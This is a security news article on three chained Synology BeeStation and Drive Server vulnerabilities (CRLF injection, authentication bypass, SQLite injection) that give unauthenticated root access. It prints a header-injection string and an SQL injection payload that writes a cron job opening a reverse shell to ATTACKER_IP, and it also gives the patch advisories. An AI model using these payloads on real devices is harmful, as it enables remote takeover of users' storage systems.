Thursday, March 5, 2026

Chaining Synology BeeStation Flaws To Gain Root Access via Exploited Task Scheduler

Security researchers chained three vulnerabilities in Synology BeeStation devices to enable unauthenticated attackers to remotely gain root access.

Demonstrated initially at Pwn2Own 2024 by DEVCORE, independent analyst kiddo-pwn published an N-day exploit highlighting a creative SQLite injection method targeting the cron task scheduler.​

Vulnerability Chain

The flaws affect BeeStation OS versions before 1.1-65374, DSM versions before 7.2.2-72806-1, and Synology Drive Server versions before 3.5.1-26102.

CVEComponentSeverity (CVSS 3.1)Details
CVE-2024-50629webapi (DSM/BSM)Moderate (5.3)CRLF injection in redirect_url parameter enables limited file read via X-Accel-Redirect.
CVE-2024-50630Synology Drive Server webapiImportant (7.5)Improper authentication in syncd daemon bypasses password check using username only.
CVE-2024-50631Synology Drive Server syncdImportant (7.5)SQL injection in update_settings command on sharing_link parameters allows write operations.

Attackers first exploit CVE-2024-50629 in the SYNO.API.Auth.RedirectURI endpoint.

By appending \r\nX-Accel-Redirect:/volume1/@synologydrive/log/cloud-worker.log\r\n to redirect_url, they leak usernames from initialization logs.​

Root RCE Technique

CVE-2024-50630 requires a valid username. Omitting the password in syncd requests via webapi forces fallback to domain socket authentication, which trusts local origin and skips password validation.

Synology BeeStation Root Exploit

Post-auth, CVE-2024-50631 targets SQLite queries in the binary protocol on TCP port 6690.

Unescaped inputs like sharing_link_customization enable breakout: “; ATTACH DATABASE ‘/etc/cron.d/pwn.task’ AS cron; CREATE TABLE cron. Tab (dataz text); INSERT INTO cron.tab (dataz) VALUES (‘\n* * * * * root bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1\n’); –.

This “dirty file write” creates a SQLite database disguised as crontab.

Cron treats binary headers as malformed lines because newlines isolate the valid entry, allowing a root reverse shell to be executed within a minute.

Synology patched these in advisories SA-24:20 and SA-24:21. Update immediately and monitor logs. A full PoC exists on GitHub.

Credits go to DEVCORE’s Pumpkin Chang and Orange Tsai for discovery, with kiddo-pwn advancing the cron technique.

Varshini
Varshini
Varshini is a Cyber Security expert in Threat Analysis, Vulnerability Assessment, and Research. Passionate about staying ahead of emerging Threats and Technologies..

Recent News

Recent News